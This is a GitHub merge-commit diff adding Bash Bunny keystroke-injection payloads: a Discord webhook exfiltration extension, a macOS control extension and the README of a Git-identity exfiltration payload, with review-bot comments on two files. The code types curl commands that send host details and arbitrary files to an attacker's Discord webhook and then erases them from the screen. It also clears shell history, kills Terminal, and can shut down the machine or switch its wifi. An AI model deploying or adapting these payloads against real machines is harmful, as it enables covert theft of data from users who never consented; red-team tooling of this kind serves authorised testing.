Merge pull request #650 from quentinlamamy/master
Submit Discord exfiltration extension + Github Information Exfiltration Payload
hak5peaks authored Sep 3, 2024
2 parents e6c3876 + 5ce34d6 commit 2570810
Showing 4 changed files with 452 additions and 0 deletions.
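--- a/payloads/extensions/discord.sh
+++ b/payloads/extensions/discord.sh
@@ -0,0 +1,86 @@
+#!/bin/bash
+#
+# Title: Discord Extension
+# Description: Interact with discord webhook to exfiltrate text or files
+# Author: quentin_lamamy <[email protected]>
+# Version: 1.0
+# Category: Extension
+#
+# To use this extension, you need to create a webhook on discord and get the webhook id and token
+# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
+# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
+# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
+
+function DISCORD() {
+
+case $1 in
+
+# @desc Initialize the exfiltration session by posting an embed message on discord with host information
+# @usage DISCORD INIT
+# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
+"INIT")
+
+curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
+curl_header="Content-Type: application/json"
+
+Q STRING "printf '\e7'"
+Q ENTER
+Q STRING "curl --location '$curl_location'"
+Q STRING " --header '$curl_header'"
+Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
+Q STRING "'\${BB_HOST_OS}'"
+Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
+Q STRING "'\${BB_HOST_IP_V4}'"
+Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
+Q STRING "'\${BB_HOST_IP_V6}'"
+Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
+Q STRING "'\${BB_HOST_USER}'"
+Q STRING "\",\"inline\":true}]"
+Q STRING "}]}'"
+Q ENTER
+Q STRING "printf '\e8\e[1A\e[0J'"
+Q ENTER
+
+;;
+
+"SEND")
+
+case $2 in
+
+# @desc Send a message to discord via webhook
+# @usage DISCORD SEND MSG $yourMessage
+"MSG")
+
+if [[ "$3" == *"$"* ]]; then
+message="'$3'"
+else
+message=$3
+fi
+
+Q STRING "printf '\e7'"
+Q ENTER
+Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
+Q ENTER
+Q STRING "printf '\e8\e[1A\e[0J'"
+Q ENTER
+;;
+
+# @desc Send a file to discord via webhook
+# @usage DISCORD SEND FILE $yourFilePath
+"FILE")
+Q STRING "printf '\e7'"
+Q ENTER
+Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
+Q ENTER
+Q STRING "printf '\e8\e[1A\e[0J'"
+Q ENTER
+;;
+
+esac
+
+;;
+
+esac
+}
+
+export -f DISCORD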
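Review bot: In the `MSG` and `FILE` arms `$3` is pasted unescaped into a single-quoted curl argument (and, for `MSG`, into a JSON string), so a value containing `'` or `"` yields a broken typed command or invalid JSON; escape it before building the payload, or state in the `@usage` comment that only JSON-safe text is accepted. Nothing checks that `DISCORD_WEBHOOK_ID` and `DISCORD_WEBHOOK_TOKEN` are set, and neither `case` has a `*)` arm, so a misconfigured or mistyped call fails silently; a guard such as `[[ -n "$DISCORD_WEBHOOK_ID" && -n "$DISCORD_WEBHOOK_TOKEN" ]] || return 1` at the top of the function would surface that. The header comment should also say that the complete webhook URL, token included, is typed into the host's terminal, so the webhook has to be treated as disclosed and deleted when the authorised test ends. Minor: the sample `DISCORD_WEBHOOK_ID` line ends in a stray `"` and both IP fields of the embed are labelled `Public ip`.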
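--- a/payloads/extensions/osx.sh
+++ b/payloads/extensions/osx.sh
@@ -0,0 +1,278 @@
+#!/bin/bash
+#
+# Title: OSX Extension
+# Description: Allow a bunch of osx interaction
+# Author: quentin_lamamy <[email protected]>
+# Version: 2.0
+# Category: Extension
+
+function OSX() {
+
+case $1 in
+
+"TERMINAL")
+
+case $2 in
+
+# @desc Open a terminal
+# @usage OSX TERMINAL OPEN
+"OPEN")
+Q GUI SPACE
+Q STRING terminal
+Q ENTER
+;;
+
+# @desc Initialize the terminal
+# Make the PS1 nicer (just because I like it)
+# Grab Host information and store it in BB_OSX vars
+# @usage OSX TERMINAL INIT
+# @info This command need a focused terminal
+"INIT")
+
+Q STRING "bash"
+Q ENTER
+Q STRING "clear"
+Q ENTER
+Q STRING "printf '\e7'"
+Q ENTER
+Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
+Q ENTER
+Q STRING 'BB_HOST_USER=$(whoami)'
+Q ENTER
+
+Q STRING 'BB_HOST_NAME=$(hostname)'
+Q ENTER
+
+Q STRING "BB_HOST_OS='OSX'"
+Q ENTER
+
+Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
+Q ENTER
+
+Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
+Q ENTER
+
+Q STRING "printf '\e8\e[1A\e[0J'"
+Q ENTER
+
+;;
+
+# @desc Minimize the terminal
+# @usage OSX TERMINAL MINIMIZE
+# @info This command need a focused terminal
+"MINIMIZE")
+Q STRING 'printf \e[2t'
+Q ENTER
+;;
+
+# @desc Resize the focused terminal
+# @usage OSX TERMINAL RESIZE $width $height
+# @param <integer> $width The terminal width
+# @param <integer> $height The terminal height
+# @info This command need a focused terminal
+"RESIZE")
+Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
+Q ENTER
+;;
+
+# @desc Clear the focused terminal
+# @usage OSX TERMINAL ZOOM
+# @info This command need a focused terminal
+"CLEAR")
+Q STRING clear
+Q ENTER
+;;
+
+# @desc Close all terminal
+# @usage OSX TERMINAL CLOSE
+# @info This command need a focused terminal
+"CLOSE")
+Q STRING history -c
+Q ENTER
+Q STRING killall Terminal
+Q ENTER
+;;
+
+# @desc Change terminal window name
+# @usage OSX TERMINAL NAME <WINDOW_NAME>
+# @info This command need a focused terminal
+"NAME")
+Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
+Q ENTER
+;;
+
+esac
+
+;;
+
+"NETWORK")
+
+case $2 in
+
+"WIFI")
+
+case $3 in
+
+# @desc Enable wifi
+# @usage OSX NETWORK WIFI ENABLE
+"ENABLE")
+Q STRING "networksetup -setairportpower en0 on"
+Q ENTER
+;;
+
+# @desc Disable wifi
+# @usage OSX NETWORK WIFI DISABLE
+"DISABLE")
+Q STRING "networksetup -setairportpower en0 off"
+Q ENTER
+;;
+
+# @desc Connect to a wifi network
+# @usage OSX NETWORK CONNECT $ssid $password
+# @arg <string> Wifi SSID
+# @arg <string> Wifi Password
+"CONNECT")
+Q STRING "networksetup -setairportnetwork en0 $4 $5"
+Q ENTER
+;;
+
+esac
+
+;;
+
+"ETHERNET")
+;;
+
+esac
+;;
+
+"SESSION")
+
+case $2 in
+
+# @desc Shutdown the computer
+# @usage OSX SESSION SHUTDOWN
+"SHUTDOWN")
+Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
+Q ENTER
+;;
+
+# @desc Restart the computer
+# @usage OSX SESSION RESTART
+"RESTART")
+Q STRING "osascript -e 'tell app \"System Events\" to restart'"
+Q ENTER
+;;
+
+# @desc Lock the computer
+# @usage OSX SESSION LOCK
+"LOCK")
+Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
+Q ENTER
+;;
+
+# @desc Logout current session
+# @usage OSX SESSION LOGOUT
+"LOGOUT")
+Q STRING "osascript -e 'tell app \"System Events\" to log out'"
+Q ENTER
+;;
+
+"GET_USER")
+#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
+Q STRING 'BB_OSX_USER=$(whoami)'
+Q ENTER
+;;
+
+esac
+
+;;
+
+"SOUND")
+
+case $2 in
+
+"PLAY")
+Q STRING "afplay $3"
+;;
+
+# @desc Change the computer volume
+# @usage OSX MISC VOLUME $volumeValue
+# @arg <integer> An integer between 0 and 10
+"VOLUME")
+Q STRING "osascript -e 'set Volume $3'"
+Q ENTER
+;;
+
+esac
+;;
+
+"NOTIFICATION")
+
+case $2 in
+
+"CLEAR")
+Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
+Q ENTER
+;;
+
+"DISPLAY")
+
+if [ -z $6]; then
+$6=${1:-"Purr"}
+fi
+
+Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
+Q ENTER
+;;
+
+esac
+
+
+;;
+
+"MISC")
+
+case $2 in
+
+# @desc Show or hide desktop icon
+# @usage OSX MISC DESKTOP_ICON $action
+# @arg <string> HIDE | void
+"DESKTOP_ICON")
+if [ $3 == "HIDE" ]; then
+Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
+Q ENTER
+else
+Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
+Q ENTER
+fi
+;;
+
+# @desc Change wallpaper with the specified url image
+# @usage OSX MISC WALLPAPER_URL
+"WALLPAPER_URL")
+Q STRING "cd ~/Desktop"
+Q ENTER
+Q STRING "curl $3 > img.bb"
+Q ENTER
+Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
+Q ENTER
+;;
+
+# @desc Say something in the way of bigben
+# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
+# @info Need a focused terminal
+"SAY")
+Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
+Q ENTER
+;;
+
+esac
+
+;;
+
+esac
+
+}
+
+export -f OSX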
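Review bot: The `NOTIFICATION DISPLAY` arm cannot set its default sound: `[ -z $6]` lacks the space before `]`, and `$6=${1:-"Purr"}` is not an assignment (a positional parameter cannot be assigned this way, and the fallback reads `$1`, not the sound). Replace the `if` block with `local sound=${6:-Purr}` and use `\"$sound\"` in the `osascript` string. Unquoted arguments elsewhere have the same fragility — `[ $3 == "HIDE" ]` errors when `$3` is empty, and `$4 $5` in `WIFI CONNECT`, `$3` in `WALLPAPER_URL` and `$3 $4` in `SAY` are typed without quoting, so values with spaces or shell metacharacters are re-interpreted by the host shell. `SOUND PLAY` has no `Q ENTER`, and several `@usage` lines do not match their arm (`ZOOM` on `CLEAR`, `OSX MISC VOLUME` on `SOUND VOLUME`, `OSX NETWORK CONNECT` without `WIFI`).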
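--- a/payloads/library/exfiltration/githubExfiltration/README.md
+++ b/payloads/library/exfiltration/githubExfiltration/README.md
@@ -0,0 +1,30 @@
+<div align="center">
+
+# Github Information Exfiltration
+**Get Git user name and email from the Git global config and exfiltrate them**
+
+![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
+![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)
+
+![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)
+
+</div>
+
+<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>
+
+# Dependency
+
+* OSX Extension by quentin_lamamy
+
+# Changelog
+v1.0 :
+* :tada: Release on 2023/08/20
+
+# Contributing
+A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)
+
+# License
+<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>
+
+# Support
+<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>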